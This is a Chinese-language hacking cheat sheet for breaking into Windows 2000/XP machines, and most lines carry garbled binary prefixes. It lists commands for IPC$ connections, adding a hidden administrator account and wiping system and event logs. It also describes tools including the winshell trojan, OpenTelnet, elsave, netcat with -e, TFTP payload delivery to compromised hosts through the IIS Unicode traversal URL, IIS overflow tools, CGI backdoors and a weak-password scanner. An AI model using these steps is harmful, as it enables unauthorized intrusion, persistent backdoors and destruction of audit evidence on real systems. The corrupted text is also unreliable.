网管和黑客都必须知道的命令
thh, ��V�� 常用的几条NET命令:
[-�l��^,,E Z1Ms�~tc�h (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
:!%oQ��QO� �X�**w��RF (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
�_?{�2{^v &rn�,[w_F[ (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
_2|,j\f�;L #8P��j�YB� (查看远程主机时间) net time \\IP地址
!o`al` q'� |aZ^K\yI�F (定时启动某个程序) at \\IP地址 02:18 readme.exe
{�Z�����|C /:S.("�Unv (查看共享) net view \\IP地址
�e�A!�aU�u w:qw�U\U>x (查看netbios工作组列表) nbtstat -A IP地址
.N%$�I6w�� Z�8m�/��8M (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
m+�o>�`1>a LcF0:�h��' (这两条把自己增加到管理员组): net user 用户名 密码 /add
��G^+0�</Q b^�v.FK46G net localgroup Administrators 用户名 /add
LE��7o[<>� �MFC= oK�D (断开连接) net use \\IP地址\ipc$ /delete
(F
@IUbn�l �8}��U/fQ~ 扫尾:
^0��r�@",� +Y���.A��s del C:\winnt\system32\logfiles\*.*
;G �w5�gK^ �YXmLd'F^3 del C:\winnt\ssytem32\config\*.evt
�f`�?�|A�
�U8moVj8w1 del C:\winnt\system32\dtclog\*.*
�5f��1yszd zP��5H�TEz del C:\winnt\system32\*.log
rIu>Jy�C"p \\[P^ tsF� del C:\winnt\system32\*.txt
�1f}Dza�9� a1?Y7(alPU del C:\winnt\*.txt
y�_����\d[ *QrTZ�$\C� del C:\winnt\*.log
Ngg (<Z�N� a+��]@$8�+ 一、netsvc.exe
hRME�;/r]X �}@�x0@sI9 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
o<x�2,��uT p�}C3<�[Nk netsvc /list \\IP地址
RlpW)\{j�? `/0FXb
�8h netsvc schedule \\IP地址 /query
tf�>��?�; C3��D1rS/I netsvc \\IP地址 schedule /start
r1,RloyZS� ,#��s}n�J4 二、OpenTelnet.exe
9D&ocV3QV� �~x82�4xW� 远程启动主机的Telnet服务,并绑定端口到7878,例如:
��ll6~�8PN (Y-����7�B OpenTelnet \\IP地址 用户名 密码 1 7878
d=�q�2Or � 6Z7{|B5}Y 然后就可以telnet到主机的7878端口,进入DOS方式下:
:g�]���[99 c: _l+CgeH telnet IP地址 7878
{�����uq�� T@X!vC�jf6 三、winshell.exe
qg+�8i9�Y! ��SV-�pS># 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
*r[P�Z{D+� ;X\��,-pjv p Path (查看winshell主程序的路径信息)
�
��~U�XW� si�)920?E& b reBoot (重新启动机器)
~]}7|V�N.} +� -U7o�gs d shutDown (关闭机器)
�{��gzL}KL �EWbF�y"�= s Shell (执行后你就会看到可爱的“C:\>”)
B�1� ��'Ds &g�|-3�)A x eXit (退出本次登录会话,此命令并不终止winshell的运行)
{���D$�#m ,�LG6py&aT CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
��R\)pW9) CmM K�\R.� 四、3389登陆器,GUI方式登录远程主机的
_8kZ>�w(�L z0a=�A�:+/ 五、elsave.exe
F �$B�_;�G =!�
�/S �| 事件日志清除工具
O��w<�=K:^ $5:j"� )$, elsave -s \\IP地址 -l "application" -C
wa�ldLb>7D qY0p)�`3!% elsave -s \\IP地址 -l "system" -C
tZwZZ0��]Z C�sXIq�.9 elsave -s \\IP地址 -l "security" -C
L��C/6'4}_ Sh�FSBD\M# 执行后成功清除应用程序日志,系统日志,安全日志
�K`�D�>�G< �,��L�X�]� 六、hbulot.exe
=fEn �h'KE R�Y�/9Ku ` 开启win2kserver和winxp的3389服务
zaa>�]~g�. 9>%ti&_-jt hbulot [/r]
� GVe[��)R BG/��M�3� 使用/r表示安装完成后自动重起目标使设置生效。
�j$�siC�sF eNpGa0� eG 七、nc.exe(netcat.exe)
an=��8['X ~��[�t�%g9 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
b �v~"�_)C P;{f+I�|`� 想要连接到某处: nc [-options] hostname port[s] [ports] ...
p�8fr�SrcU *ax$R6a#X� 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
Y�R^J7b�\� ma,�H<0R�� 参数:
�;�5�?��$q hx�GZ}zq*S -e prog 程序重定向,一旦连接,就执行 [危险!!]
�6j+_�)7.V QV��sOB$�� -g gateway source-routing hop point[s], up to 8
C�65��(
m q0��&g.=;� -G num source-routing pointer: 4, 8, 12, ...
+g>)��B�ur w/#k���.YE -h 帮助信息
QJjq�tOf> FQ2���6�(. -i secs 延时的间隔
a^>0XXr}�Y T���Dq(%IW -l 监听模式,用于入站连接
@))PpE`co8 qlN�K�� }� -n 指定数字的IP地址,不能用hostname
2r]8�0sWY� l`M{Ravvn* -o file 记录16进制的传输
Cj#$WZ�ga% ZkSlztL)Tr -p port 本地端口号
t�I�~.3+�F 3o�5aB1��� -r 任意指定本地及远程端口
CI{�? K��b mf�c\w���' -s addr 本地源地址
��pa�*bqPi 3dTz$s/�[� -u UDP模式
8m\*�~�IX= ��g��i#b�U -v 详细输出——用两个-v可得到更详细的内容
Q30A�aG}f� ~7I�XJeo�n -w secs timeout的时间
��"AMbU6�8 �_�o`+c wc -z 将输入输出关掉——用于扫描时
�w3�W�Bg�H 八、TFTPD32.EXE
s�laY�r`�u �,4M7:=g�f 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
Nr8#�/H2f� ^}fc��]ovV http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
CB]��#`|f� ����^�{lcj 然后可以直接令文件运行:
F�L*qV"r^n 4���i|y�Ef http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
LV�P2jT�z� 38#BINhBt� 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
MH7� �n@.t )7j��jfD�\ 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
�#�q#�C_"� ��Au~l�
�O 一、一 Xscan命令行运行参数说明:
��&c>%E%!" p8�,��Rr{� 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
�w+($=�n~ �;5Spdi�4w 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
H\H4AAP5F$ "NWILZwE�V xscan -file <主机列表文件名> <检测项目> [其他选项]
d�5�j�Z?�� *oZ]k`-!8� 其中<检测项目> 含义如下:
.^
�d��jt� ��&8$Gy��u -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
A{X:p3�$eN bl�yU5�3g� -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
�0P i+� (X �[��}:;B$, -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
pZ���H�x�� >�J�(�.�_K -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
i[�L5,%5<H )S"!�)\4 b -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
GWd71ZtFO �5,��dKha� [其他选项] 含义如下:
^m��
pWQ`R &GYnGrw�?@ -v: 显示详细扫描进度
%�x�{jmZ$} o_ng{��S�L -p: 跳过Ping不通的主机
6)�=`&�>�9 -@b�OFClE� -o: 跳过没有检测到开放端口的主机
-4wr)zjfW� lid�V�e]�> -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
